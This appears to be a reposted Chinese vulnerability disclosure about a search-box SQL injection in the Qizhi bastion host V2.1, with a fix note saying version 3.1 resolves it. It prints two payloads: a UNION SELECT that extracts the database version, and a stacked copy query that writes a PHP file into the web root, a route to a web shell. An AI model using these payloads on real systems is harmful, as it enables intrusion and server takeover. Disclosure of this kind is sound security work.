奇智堡垒机存在搜索框注入,通过1%')/**/and/**/1=2/**/union/**/select/**/null,version(),null,null,null,null,null,null—
1%');copy/**/qmsectexts(shell)/**/to/**/'/var/www/shterm/client/secqm.php'—进行写文件了,写入测试文件后,我们发现文件成功写入。
漏洞 证明:
修复方案:厂商已经升级到3.1版本,已经无此漏洞。建议部署该堡垒机的公司升级到最新版本。
查看更多关于奇智堡垒机V2.1存在搜索框注入及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11652